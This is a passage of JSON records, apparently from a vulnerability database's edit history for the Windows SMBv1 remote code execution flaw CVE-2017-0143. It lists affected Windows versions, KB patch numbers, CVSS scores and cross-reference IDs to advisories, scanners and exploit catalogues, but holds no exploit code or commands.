"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T06:59:52", "differentElements": ["msAffectedSoftware"], "edition": 43}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-13T10:45:10", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB3205409", "KB3177186", "KB4012598", "KB4012216", "KB4012217", "KB4013429", "KB3210720", "KB4012212", "KB3205401", "KB4012213", "KB4012606", "KBMS16-110, 3187754", "KB4012215", "KB4013198", "KB3210721", "KB3212646", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T10:45:10", "differentElements": ["msAffectedSoftware"], "edition": 44}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-14T02:48:57", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012598", "KB3210721", "KB4013429", "KB4012212", "KB3205409", "KB4012606", "KB4012216", "KB4012217", "KB4012215", "KB3205401", "KB4013198", "KB3212646", "KB4012213", "KB3210720", "KB3177186", "KB3213986", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": 